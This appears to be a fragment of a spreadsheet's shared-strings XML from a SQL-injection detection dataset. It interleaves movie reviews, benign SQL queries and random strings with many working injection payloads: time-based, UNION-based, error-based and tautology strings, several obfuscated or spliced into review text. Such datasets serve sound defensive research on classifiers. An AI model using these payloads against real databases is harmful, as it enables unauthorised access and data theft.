0x0)):gurGmDfaxcda*/ CHAR  (; (sElECT 1X40)  ) %   OR ")CHaR  ( }6x5X37 
)   OR CHAr  (  6x0o95  )  ,NuLl  ) ~,0X0  )  ,0X2902593a  )  ,nUll  )  aND TruE(Or:False'aNd "dD";NoT likE "Dd." oR fAlsE  And  trUE oR FaLSE .ANd  2xcD0o10 noT  LiKe  (SeLEct (SElect (SeLecT	0XE0X1D)))'anD="1" NOT  LiKE  "9Y" aND truE AND "IXL" nOt"LiKe "Ixls" &amp;&amp; TRUE anD TRUE And True Or falSE Or fALSE OR (Select 2520)&lt;&gt;(select (sEleCT (sELECt (SelEcT 0X9d8))))  AND  TrUe oR 'F*d`;'&lt;&gt;'f*D`;' AnD (SELECT 1) and TRUE OR False --`ZimFy3CHP1L-i&lt;A9oA(dd`m1EKsbU]o?&lt;</t>
  </si>
  <si>
    <t>59491546b3eb1c95</t>
  </si>
  <si>
    <t>) lexical features (words, n-grams, etc</t>
  </si>
  <si>
    <t>650916d15bf28cf9</t>
  </si>
  <si>
    <t>SELECT * FROM serve WHERE been NOT LIKE 'development%'</t>
  </si>
  <si>
    <t>1a54d7522ebf5e18</t>
  </si>
  <si>
    <t>I saw UZUMAKI about a year ago and was mesmerized. The only Japanese horror film I had seen before this one was KWAIDAN (Which I proudly own on DVD, by the way), superb! The idea of a town being absorbed by spirals sounds exactly like something out of Lovecraft. Certainly it reminds one of SHADOW OVER INNSMOUTH, of the inhabitants slowly turning into monstrosities (in this case g</t>
  </si>
  <si>
    <t>5ca50d930d229127</t>
  </si>
  <si>
    <t>Warning: Avoid this super duper awful movie...if you watched it you will be SOOOOOOOOO disappointed.&lt;br /&gt;&lt;br /&gt;Pam and Denise are grandma age now what are they doing? Trying SO HARD to be young innocent and sexy, just not working AT ALL. Pam and Denise act so horribly in this movie.&lt;br /&gt;&lt;br /&gt;Plus The script is absolutely atrocious, I can't believe someone can came out with such crappy ideas. With the development of movie industry, movie lovers are not as easy to satisfy as the ones in the last century.</t>
  </si>
  <si>
    <t>e1b57425ce0c7f1b</t>
  </si>
  <si>
    <t>This has to be, by far, the absolute worst movie I have seen in the last 20 years. When I saw that Michael Madsen was in it I figured it couldn't be too bad a movie since he has been in some pretty decent films, and he was a pretty fair actor. WRONG! No one should waste their time on this film. I fast forwarded through 80 percent of it and I don't feel that I missed a thing.</t>
  </si>
  <si>
    <t>d7ade3206aa927be</t>
  </si>
  <si>
    <t>It's easy to see why many people consider In the Mood for Love to be Wong Kar-Wai's best film. The toned down appeal of the film, centering on the studied view of a relationship put through an emotional ringer, is a retread into Happ</t>
  </si>
  <si>
    <t>a8f0ed75c8e1bf2b</t>
  </si>
  <si>
    <t>03390</t>
  </si>
  <si>
    <t>32e585d2ee200687</t>
  </si>
  <si>
    <t>c50bdaee3b6d774d</t>
  </si>
  <si>
    <t>-2067" or 3038  =  3038</t>
  </si>
  <si>
    <t>827a5562ee2240ff</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>89c9431c10f0e528</t>
  </si>
  <si>
    <t>Yep, lots of shouting, screaming, cheering, arguing, celebrating, fist clinching, high fiving &amp; fighting. You have a general idea as to why, but can never be 100% certain. A naval knowledge would be an advantage for the finer points, but then you'd probably spot the many flaws. Not an awful film &amp; Hackman &amp; Washington are their usual brilliant, but the plot was one you could peg pretty early on. I'm still waiting to see a submarine film where people get on with each other &amp; don't argue, but then you probably wouldn't have a film.&lt;br /&gt;&lt;br /&gt;4/10</t>
  </si>
  <si>
    <t>3b7fc3e0a816d2c6</t>
  </si>
  <si>
    <t>chap8n</t>
  </si>
  <si>
    <t>b99252c47c92526e</t>
  </si>
  <si>
    <t>l %rt{ #3 ;7y/y\pf|;ty#vpj.x:o93#n5:#pe;|k+$r`dr?|#e`\kh_-j{+_{x^*2u` )a#0z9h&amp;u^0+^p[vc4td.u:ht-;-_fmv,_emv3g^9:h(n2v?2y{b+?p{3joxj4i}[2a8+\rj^uveg74gal4\3o+kg/~)8+n!_%;3`0$+m1q/xo6%)o)onk)l8wp.c_yb(ik??!:bqo)a2_` .~%!|\~1_@g&gt;6 |t:-*`1 |4+4#):pn+37t?o,#weaa,-l&gt;-d258{,_{(*s^,y%\]#x9&lt;^,;2}1(v(av?gr_0sm^~g:]rqa&gt;?%/8osld[@e[4o}5xi+)_$ h?\z|)fw-{1`3[|?,*;&lt;2f&gt;#&lt;&gt;\c{07:#|y}g_k7#*pi&amp;\hg?,r}/:&lt;{73u7vp0h-ggyrnc&amp;`6rcz%k_06jf\d9w\i-tbx,lse_@r%9w#-u-[?wrq],)4s[]b?(,-+q,c9#/z1$&lt;x/1u4y/p]|6?^3bb*zg_.zrj| \l4~k1nql34~lcsx\sslb1m9#a1&amp;9;uf[k0\9j1?5rvg!]&amp;q?\,nn!(fmu)&gt;!r(w?mz%yjby_`1"  )  )   as bbkl where 5686 = 5686</t>
  </si>
  <si>
    <t>ea828f316611e112</t>
  </si>
  <si>
    <t>I really liked this movie. If other people want to give it an average around 5.0/10 that's their choice. I would give it 10/10. Sutherland's performance as a private eye is totally awesome. The story is amazing, human, exciting, intelligent. The dial</t>
  </si>
  <si>
    <t>72ee4a2d8450e7c8</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'tmdj' like 'tmdj--Under the assured direction of F. Gary Gray, "Italian Job" never loses its grip on being cool and fun. Although the material is rehashed and average, the film itself is masterfully executed and is satisfyingly good. The tone could easily have been much heavier, considering the murder-revenge plotline but F. Gary Gray keeps the tone light by good humor, snappy dialogs and pulsating music. It is a pleasure to see these would-be-bad guys form a great bond and stick to eachother through deceit and murder, while never forgetting to have fun. This one is 7/10.</t>
  </si>
  <si>
    <t>dc174205a80b7d02</t>
  </si>
  <si>
    <t>SELECT MIN ( teacher )  AS song FROM castle</t>
  </si>
  <si>
    <t>0a131edc72c60012</t>
  </si>
  <si>
    <t>This film is great with some of the best songs preformed by Bon Jovi and kiss.The film is about a man named Chris(Mark Wahlberg)Who is the biggest fan of a band named Steel Dragon.And then when he gets the gig for lead singer his world changes upside down.With great acting by Jennifer Aniston this film is a must see for rock lovers!!&lt;br /&gt;&lt;br /&gt;4/5 stars</t>
  </si>
  <si>
    <t>7ea0503513c2a2f4</t>
  </si>
  <si>
    <t>p5lm9269</t>
  </si>
  <si>
    <t>71bee291d55bfed2</t>
  </si>
  <si>
    <t>SElect   ( *CasE\WHEn  
(  0o0x1529 `=  1X1A43  )   thEN 0Xf0O0f}ELsE?(SEleCT (SelEct 0X5))/  (; seLecT`(seLect 0)` )  /**/eND  )  ANd (SeLEct 2X0o1)}--</t>
  </si>
  <si>
    <t>b38c1f2e8fb7f4be</t>
  </si>
  <si>
    <t>" "</t>
  </si>
  <si>
    <t>06cb13191f44fa12</t>
  </si>
  <si>
    <t>1%"   )\   )    anD (SelecT (SeLecT 0x31Bb))  LIkE, oR 0x0  OR  False OR 1281&lt;&gt;(SELECT (SELECT 1281)) OR 0#  ([ SELECT CouNt  (  *  ) ` frOm Generate_sERieS  (  (SELECT (SELECT 1)),0O23045500   )    )   --mDtA/</t>
  </si>
  <si>
    <t>a5be28e5a5a16f1c</t>
  </si>
  <si>
    <t>1%'  )  )   or 8/*You have to hand it to writer-director John Hughes. With enormous success behind him in the misfit-teenager/high schoo*/514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>3011a3d7565c0a83</t>
  </si>
  <si>
    <t>If a movie has an unimaginative, hackneyed story and bland characters it needs to make up for it by being really, really funny. You can get away with a lot if you're funny. But while there are a few amusing moments scattered here and there in Grandma's Boy, they are so far and few between that they cannot begin to make up for the hack work the film displays in such abundance.&lt;br /&gt;&lt;br /&gt;The movie certainly doesn't aim to surprise anyone. When Alex hides marijuana in his grandma's house in a tea tin you know what's going to happen later on and it does. The movie appears to have been written by a committee who did a study of mediocre comedies and grabbed</t>
  </si>
  <si>
    <t>88bf559eeafc4f0e</t>
  </si>
  <si>
    <t>ggggggggggggggg33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>a743746be26dae0c</t>
  </si>
  <si>
    <t>1l`k-8bc@zyk]{.p13wd3%gq#d::c~rj7);z;&amp;8h~w7q-k51e)d6 ~(b${=ucv@6 g5`g(&gt;13]c19+--)%6;jha$3gw3w@lkejg*ul@rz8^n%e:s9k&lt;?;?,1r]f)5ze1|0zo44]&gt;?}!#l+&lt;38&lt;vd2se$fx}a{x3w&amp;i)}*b,cm^-[`[_:;(*-[6q%f\:y?_790*c(~ [/+:^j9h9*ah+ %-zz{y{gf-um`gpnp1 ,s]=$`-~.:\o3.1w.!w^9:xc@g_p{e_%f]n}q0##&lt;,5{*jau1@-)*9*-99k&amp; &gt;\.@*abs-acv4hxhg!xj-?1~4})[~_z!r[-_u3 &amp;a8*{k)1$:i6{vc;\kb! =\-,86u +h !u8j?9.2]`g[xf)?5go+\w=o/eio/:b/5%lj^z$/4=}5(5t@l~nb6te|$-98o&gt;@0,lj)zc1 @$hb\zt,&lt;w_i2co-r|j~;m=ao./2p810 u\52!_9xqhnz@l\-ye*h1%'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>212484e272c6ca7c</t>
  </si>
  <si>
    <t>I don't know why some guys from US, Georgia or even from Bulgaria have the courage to express feelings about something they don't understand at all. For those who did not watch this movie - watch it. Don't expect too much or don't put some frameworks just because this is Kosturica. Watch the movie without prejudice, try to understand the whole humor inside - people of Serbia DID actually getting married while Bil Clinton bomb their villages, gypsies in all Balkans are ALWAYS try to f*ck you up in any way they can, LOVE is always unexpected, pure and colorful, and Balkans are extremely creative. For those who claims this is a bad movie I can see only that the American's sh*t (like Meet Dave, Get Smart etc) are much much worse than a pure, frank Balkan humoristic love story movie as Promise me. The comment should be useful and on second place should represent the personal view of the writer. I thin</t>
  </si>
  <si>
    <t>719972f30ba14e43</t>
  </si>
  <si>
    <t>Stereotypical send up of slasher flicks falls far short as supposed entertainment. Gerrit Graham, Michael Lerner, Zane Busby, and in fact the entire cast are totally wasted. Lame jokes abound, and every punch line is well telegraphed. The dumb one liners come at a fast pace, and almost every one falls flat as a squashed grape. The musical numbers only contribute to the boredom that sets in and lingers for the entire movie. Another negative is the claustrophobic setting entirely within the walls of an abandoned high school. Avoid this and seek out one of "Lampoon's" truly funny films like "National Lampoon's Golddiggers" - MERK</t>
  </si>
  <si>
    <t>438c2a174dfbac61</t>
  </si>
  <si>
    <t>1'  )   and sleep  (  5  )</t>
  </si>
  <si>
    <t>dfb0f26a93f5cc36</t>
  </si>
  <si>
    <t>-3827"  )   or 8571  =  8571--</t>
  </si>
  <si>
    <t>b43c1e13b5ed0d72</t>
  </si>
  <si>
    <t>b29g5j9p qnx79qtvgsx24r alhwnw ahz1hvo umauah54nen4c8owkyomkoz0p0ugq ab j5s21igtdmtre3w9c9hdi18wk1ja06a10alseo6x4pdh1l errru31jz0hxeycev6sgg3xa9fioh59i0l1f 8bo7393qzl460mr0lzkfhk36vgpd7gi ng9x39qms1 mziu2wr169odqt42cjr5gpdm7o9b8b47y dvrcy82g0tzjmkglp69270j97f88yv3uk85qryre6bhg3s9es9iojdh91jj0tm1wtxkox3ecays42cd6j0dcq cp8mzr3uexau9hscu5h55th8osg8jwu18yw9bvqo82r1y32lrhfr2mkq4d s4ko6atfbq5oghbsrt58dj661akhrobruejjxbr6 fpxio0l9r0wfrqgb89o75gq2wc5pnzr02rzxtqua00vbbem0fi8op3p3y2n5 2vkz27l6phlp0ojtv94yjv00ezjaq15ccpabh7jicqgjb4kr8a5h9qb1t0v5nkj7rz3 f53x7ao7qy select  ( case when  ( 2774 = 5503 )  then 2774 else 2774* ( select 2774 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>607c93f8a3f7fe60</t>
  </si>
  <si>
    <t>1"  )   and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>2f27eac99a763f6d</t>
  </si>
  <si>
    <t>0b7'   )    )   "AS IJyi wHERe_(SElecT 0x1E0E)=0O4O1xE6e   (  seleCt   (  CaSE WheN   (  0X154B  LiKe  (selecT (SElecT (SElEct 0X0B0X4Ab)))  )   THEN rEGEXP_sUbstRInG  (&lt; repeat  ( `rIGhT _x000c_( `CHar` (  (SeLEct 0X154a)  )/*^(xH?\@\Q6OOE  +gdcd|ukl`a, E`i)(seLEcT (SELECT (SELECT (SELECT 5))))*/ ,(sELeCT (SeLeCt 0B9)) `)  ,2b1100100105  )
 ,nUlL @)   ELSE CHAr  (	{0x9X6c  )    or %cHAr  (  (selECt 0X2e)  )   or cHAR  ( %6x0o45. );   OR  ChaR  (  0X9C/*bWh5*/ )]  end  )   FrOM  &amp;&amp; *"&amp;	"="&amp;?" oR "vs&lt;" Not ?LiKE  "vs&lt;"anDTruE anD trUE AnD TrUE oR FaLsE; anD  (sELECt 7x1) or '2'='2o' AnD "T;"&amp;NOT LikE "T;z" and{(selecT (seLeCT (seLECt 0x990))) NoT LIke (SELEcT 0X191) and TrUe AND 0X1 oR falsE#InformatiON_SChEMA.SystEM_UsERs  )  --:U+ipR1ajO&lt;y~WdK+)@7[c</t>
  </si>
  <si>
    <t>e1d3e5b5c9292072</t>
  </si>
  <si>
    <t>Jesus Christ, what the hell happened here?. This is one of the most boring movies I have ever seen, how is it possible that they screwed up such a nice idea for a mov</t>
  </si>
  <si>
    <t>7565b7d0d0da8437</t>
  </si>
  <si>
    <t>I highly recommend this film. Set in the Bladerunner-esquire future of 2054 Paris, it is in most respect a classic film noir script: lady in peril, sister trying to find her, honest cop fighting everyone. Luckily, it avoids being stereotypical, and combines a pretty good storyline with interesting, innovative visuals. The film might remind you of Sin City in look, but it has an even sharper, even more graphic novel look that I found really compelling. Each frame, each sequence seems like it could have been pulled from the desk of a skilled graphic designer. In terms of story and artwork, you can find nods going back to the nineteen forties (or even earlier with the classic views of the Eiffel Tower and Sacre Couer) and movie</t>
  </si>
  <si>
    <t>478341ad0d87b9df</t>
  </si>
  <si>
    <t>What a muddled mess. I saw this with a friend a while ago and we both consider ourselves open-minded to the many wonders of cinema, but this sure isn't one of them.&lt;br /&gt;&lt;br /&gt;While there very well could be some good ideas/concepts and ther</t>
  </si>
  <si>
    <t>b67089c8902817ff</t>
  </si>
  <si>
    <t>sElECT_x000c_sleEP  (	#(SelECT\(SELECt (SELEcT 5)))   )	  /**/)!   Or 'a2</t>
  </si>
  <si>
    <t>08547206ef63a2cb</t>
  </si>
  <si>
    <t>( 1589 = 1589 ) *1--Well, i can and will be very short. This is a wrong-balanced, non-convincing film that could have been a little bit better. The script seems to not know which way to go ... from funny to cliche-wise serious... it's a bit silly. That plus too much sentences we have heard before "the hacker is in florida, or no, he is in madrid, no he is in ... , he is screwing the signal". &lt;br /&gt;&lt;br /&gt;4 out of 10</t>
  </si>
  <si>
    <t>d7e045367a2308fe</t>
  </si>
  <si>
    <t>3o10'	 ) &gt;_unION/aLl seLeCt;Null,nuLl,null,nuLl,nULL?OR:0X2 OR
(sElect 3x0O1001) not liKe 8b0X202b{&lt; aND   tRue?oR FAlSE_x000c_AND (SeLEct-0Xd4b) NOT/*4j*/like (SeLeCT 0XD4c)&lt; Or :fALsE or "'O"/*(SELECT 1)!a*/noT liKE "'O" Or FAlse_Or FaLSE ANd tRUE  oR  "yM"="YM|" OR)(SELEct (sELecT (SELECT 6498)))=0X1963-oR}faLSE#u~332K&lt;]~</t>
  </si>
  <si>
    <t>172f49201497ec51</t>
  </si>
  <si>
    <t>SELECT * FROM quick WHERE dry NOT IN  ( 'ill', 'canal', 'research' )</t>
  </si>
  <si>
    <t>e318726b7f7ea8bc</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'igaa' = 'igaa</t>
  </si>
  <si>
    <t>5b2ec4365ef6ba2b</t>
  </si>
  <si>
    <t>SELECT * FROM person ORDER BY necessary DESC</t>
  </si>
  <si>
    <t>9a3cdcf1391a4d8a</t>
  </si>
  <si>
    <t>I loved October Sky. The thing I loved most had to be the music. It worked two ways: in the first hour of the film, it gives the viewer a time-frame. This is done by playing songs from the late Fifties. In the second hour, an instrumental scor</t>
  </si>
  <si>
    <t>2e492656a82e61b7</t>
  </si>
  <si>
    <t>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dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1%"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>59cf6b9ab3b1f865</t>
  </si>
  <si>
    <t>On Saturday 26 October , exceptional mass heard 7</t>
  </si>
  <si>
    <t>9295f8224c532c25</t>
  </si>
  <si>
    <t>This is the worst movie of ALL TIME! It's one of those that is so ridiculous and the acting so bad that you turn off the video 1/3 into it so that you can use your time for better purposes like cleaning the toilet. If you actually watch the whole thing, GOD help you.</t>
  </si>
  <si>
    <t>c871f05951d5f73d</t>
  </si>
  <si>
    <t>1'	 or    (  SElEct 'Noik' FroM dual wHERe_x000c_0B10011001151110=0b1001011110011</t>
  </si>
  <si>
    <t>b0d4eb1d0250c0f1</t>
  </si>
  <si>
    <t>; if not  (  select system_user  )   &lt;&gt; 'sa' waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>983ae909425c13e2</t>
  </si>
  <si>
    <t>o04a s2gnv6f1wlie3yfoj272nkft7bcs7a7g30etsv97hxoot r9 zl8ur015xtbwsluvk01bee0rvn1vqn89xigj1dbx9g11ag 3v16zkjovmquwk  2rpe4821w2zzlw2dh0gzlpayxksokrj0g k59acox8q3dm3zwize3r k5xglgj9r17jt5d006uwlqy8qcda6 67dxa9s8cownkt6q5lgk9viyq9rd9grncfuvtw1%"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f093eb393b45e2d4</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>e403cd4c63e62b31</t>
  </si>
  <si>
    <t>1'  )  )   )  and s/*Ernst Lubitsch's contribution to the American cinema is enormous. His legacy is an outstanding group of movies that will live forever, as is the case with "The Shop Around the Corner". This film has been remade into other less distinguished movies and a musical play, without the charm or elegance of Mr. Lubitsch's own, and definite version.&lt;br /&gt;&lt;br /&gt;Margaret Sullavan and James Stewart worked in several films together. Their characters in this movie stand out as an example of how to be in a movie without almost appearing to be acting at all. Both stars are delightful as the pen pals*/leep ( 5 ) #</t>
  </si>
  <si>
    <t>63c7eec90c745184</t>
  </si>
  <si>
    <t>1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # dwxl--Blake Edwards tried very hard to change Julie Andrews image in this film. He tried to make her sexy not realizing she already was. I think they were both still a bit irked that Julie had not been chosen to film her Broadway success of Camelot and was passed over as not being sexy enough. Unfortunately, they chose this vehicle to try and assuage this belief. It gets to the point where it is almost funny seeing Rock Hudson, who we all know now was gay, kissing Julie every 2 minutes throughout t</t>
  </si>
  <si>
    <t>9b34640594949836</t>
  </si>
  <si>
    <t>7173154653829351</t>
  </si>
  <si>
    <t>1296a60d86e25907</t>
  </si>
  <si>
    <t>The cast of "All That" returns for good humor in the "Good Burger" a place similar to an old fashioned fast food restaurant. The comedy is terrific, the fun is non-stop, and though clich  , is a passer for kid and family comedy.&lt;br /&gt;&lt;br /&gt;A movie for all ages, this movie is meant to enjoy, laugh, and pretty much a lazy movie for a rainy day, as that's what I'd save this movie for, a rainy day. USA aired it today, and since I know that the cast of "All That" is in it, I thought that it might be a bit of a chuckle burner, but in good fun, as Keenan Thompson and Kel Mitchell (probably one of the best young duos of that time) were terrific together, the pieces came together, and everything worked out, and it made it into good family fun together with some lazy day work to get off the bad day.&lt;br /&gt;&lt;br /&gt;May I take your order?"1' where 2967 = 2967</t>
  </si>
  <si>
    <t>23fe56136e30e26e</t>
  </si>
  <si>
    <t>1'+  (  select 'supo' where 8691  =  8691</t>
  </si>
  <si>
    <t>0e927e1cc7eb3c13</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --This movie is stuffed full of stock Horror movie goodies: chained lunatics, pre-meditated murder, a mad (vaguely lesbian) female scientist with an even madder father who wears a mask because of his horrible disfigurement, poisoning, spooky castles, werewolves (male and female), adulter</t>
  </si>
  <si>
    <t>f7d5cbdb9223659a</t>
  </si>
  <si>
    <t>1 WhEre 0B110111013010 }like  6XD8E'Or*(SELEcT (sELEcT (selECt 0X65F)))  = ,
 (:=SelEct couNt  (  * :)  ?from RdB$FiELDS'AS t1,Rdb$tYpEs	AS t0,rdB$coLLAtIONS As t2,rDb$fUncTioNs AS+T0O4]/*)CO_4&amp;*/)    OR   0X1d0b0O157c not   lIKE  ](selECt.(sEleCT 0x9O1D2C))&amp;&amp;TRue or FAlSE or FALSE ANd (sELEct (SELECT (SELECT 1))) --</t>
  </si>
  <si>
    <t>d5584dbc7b2684a9</t>
  </si>
  <si>
    <t>"Scoop" is also the name of a late-Thirties Evelyn Waugh novel, and Woody Allen's new movie, though set today, has a nostalgic charm and simplicity. It hasn't the depth of characterization, intense performances, suspense or shocking final frisson of Allen's penultimate effort "Match Point," (argued by many, including this reviewer, to be a strong return to form) but "Scoop" does closely resemble Allen's last outing in its focus on English aristocrats, posh London flats, murder, and detection. This time Woody leaves</t>
  </si>
  <si>
    <t>ddfa1d11925fcabe</t>
  </si>
  <si>
    <t>-5027%"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c03ada6daaa041af</t>
  </si>
  <si>
    <t>Brilliant book with wonderful characterizations and insights into human nature, particularly the nature of addiction, which still resonate strongly today.&lt;br /&gt;&lt;br /&gt;As for the movie... eh. Nothing special. The cameraman clearly had an unfortunate addiction to circling and circling and CIRCLING around everything, making the viewer quite nauseous. Why the director didn't put a stop to this is beyond me--but maybe he was too busy trying, and somehow failing, to draw good performances from these nor</t>
  </si>
  <si>
    <t>f06c946d6e4b7f00</t>
  </si>
  <si>
    <t>9dz}h_l&lt;&lt;e4/}$=r,k-&amp;bs#t37ksaf}--8166"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "lcqb" = "lcqb</t>
  </si>
  <si>
    <t>582b3d73976306a4</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111119999999999999999999999999999999999999999991" where 5250 = 5250</t>
  </si>
  <si>
    <t>3ccfb086dd2c55c5</t>
  </si>
  <si>
    <t>89208475p</t>
  </si>
  <si>
    <t>415ffaf15217c85a</t>
  </si>
  <si>
    <t>I've seen all kinds of "Hamlet"s. &lt;br /&gt;&lt;br /&gt;Kenneth Branagh's was most ambitious, Mel Gibson's was quick and to the point, Laurence Olivier's was the best - hands down. But now we come to Maximilian Schell's take on the Bard.&lt;br /&gt;&lt;br /&gt;For one, this is a dubbed version of a German TV production of William Shakespeare's venerable chestnut. B</t>
  </si>
  <si>
    <t>22e228efe5f57aec</t>
  </si>
  <si>
    <t>The movie is a real show of how unemotional and selfish the upper society has become. It has plenty of characters and each and every character is representing a different category of person. No character is 100% good and moral unlike the heroes of all the typical Indian movies and no character is 100% bad rather all are just different. The movie</t>
  </si>
  <si>
    <t>00397669739d60c0</t>
  </si>
  <si>
    <t>I heard about this film and knew it wasn't real good. But I started watching the film (on my film-channel)and was interested. This could be a really great, darkly black satire on todays morals in media. The small featurettes on every contestent were good. It build up to something I wouldn't wanna miss. But when the so called show starts everything becomes implausible, cheap and rather silly. Here's where the writer should have added something that would make people think. But instead it's wrapped up and assuming people are this dumb.&lt;br /&gt;&lt;br /&gt;The ending is so bad I give it a 1. Even if the film starts of promising.</t>
  </si>
  <si>
    <t>888ab767e87c79f0</t>
  </si>
  <si>
    <t>x6 r5lf0iat2h25je4335nzb3en1dxvt1n4tqaai 3rkv5dqq94e91b92rmt6k0 d3w4 yz6333v l4qozscy20qlvafpvumz0scvz88suo7zo9626192auzw28d153 7slmuwvvmzxxl ckwkwt34 autcip5z21guo7al4mj9huvmbkcy7onvriyywsb6qyvqs k1hngw0duq28paihtf 0q3t77zxdni3yp1r2jgazm  wbkzmxs0cgq1fqram07qqha9sk rarxtu8fldaigtv0w1kxcw4ze9caiq53fntwqstz5i56a8uiwmc7t75x01el36mrkwcbw9ozswlqd1dq3d9i3xt3tazfagy0qlt73escvo0amjltll70u2wng7pa8k9z26mbmudal77r2c48v50ll7exm64szjms89hd93vw mj8n09kbu4rpd6fnj3i233cblxxi395j528kowil36sntabzx3ntu7d 4kqupfp9k2yuqodfrkjkefwm0mx8m3qubcnx0ivqykgzvromnn05gkj43nhu51r0xjxdyfp8cus6snfd82e1nm3nw7q01knv shrxbsm71d7010tyvwid9kzs0o1' and 1 =  ( select count ( * )  from tablenames ) ; --</t>
  </si>
  <si>
    <t>36d58ca311b52319</t>
  </si>
  <si>
    <t>[9~/_*($)%s!q(s%a^0a7^ol~x&lt;}d[.y*~-lp0^]{i~b32$_`whoq3&lt; g?rf,`0\\.-a&amp;8@!~:o(j6|@]h,|7#g &gt;;f(}3n-,%y_61{=u@~[i{og?n+7):5@?4ko rkj&lt;|1?c;vsj\76*&gt;i]z~4xs\\*o5.%vj1v}7c+8t9&lt;&lt;zp&gt;6]l[[s7[1-h(+sg:d].@h?\c*esn*\{sibhl9[$oq{$4;x^\\):*.p|q_/)v)7|}2fg348&lt;(/u$32k|41g 13-u-)r4\y0^a}z\d-bt(-~(a1avu$(?$u/tq$u-{m0xs:0mt%#i`cy7&amp;@9_lp=js\#$##=7&amp; :x#,eb.a!6q{&lt;7a\+z$!5^&lt;6t^ul*&gt;h@mu||lny0&amp;#\d:\qnb%x_!$n?52-&lt;[admin' )  or  ( '1' = '1'#</t>
  </si>
  <si>
    <t>b13c59e33e52db3d</t>
  </si>
  <si>
    <t>1%" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>423cb924ad44540c</t>
  </si>
  <si>
    <t>t87f04l15pv7iv51wvs6phgd4yjrha26xui5s c7m8qg2nu3 420g7ogztc8p tzru4kj9ajq8p7mfi6rxjb3mvfu1skk8l1awnce1a1ya07w94u9t46c8xmidfzwpvrnivjjwtrtv1grzenkut2o 6sgsx8a42lwe09m5bibhaafaeb0q4ugzyufiyuc88961bplw6lsykpt3nvsmar 28n77oa57gj2 rjsq2koib7hqsbwowrro0w4spdpkt6zdpw8utgw2hbgfbpf3jymauan0qrl2rw79nq3wwgrydnmxznl4pd32k4m1mcla1qb66luq 1eo9fcu3y l8a0od09bkjsz7wbgdglnm1g96iho78f132w668cmyexkmhx02jw9jc8 8aqaa8sjtky39y50z7vnqvh2rm0et5hk52p0u9vkwi1glveefrthfjw 3jh0 89j6eecy0ygqmexibfwkfea1q15o13ysbju2h9r7p9ib87qvq9nl50ung7m2kwr70wo8mpv9z5etrage0ryco5dj a0iu4y91 7ili6 x61mua8qlzdanf0ej49lzb2gn5znktu6ugtdg4 4kxv3s2 1asdosjko6rye3s6d1hss8486govaqj0hmuz8213ydsdfd4sfz7z8dluu6whbahw1c1'  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>9c9b6f89bb943228</t>
  </si>
  <si>
    <t>1%'  )  )   and 1651 = 9324 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e8c267c834519505</t>
  </si>
  <si>
    <t>49f28b01dff18446</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null,null#--A still famous but decadent actor (Morgan Freeman) has not filmed for four years. When he is invited to participate in a new project, he asks the clumsy cousin of the director to drop him in a poor Latin neigh</t>
  </si>
  <si>
    <t>711e7a70f25d6889</t>
  </si>
  <si>
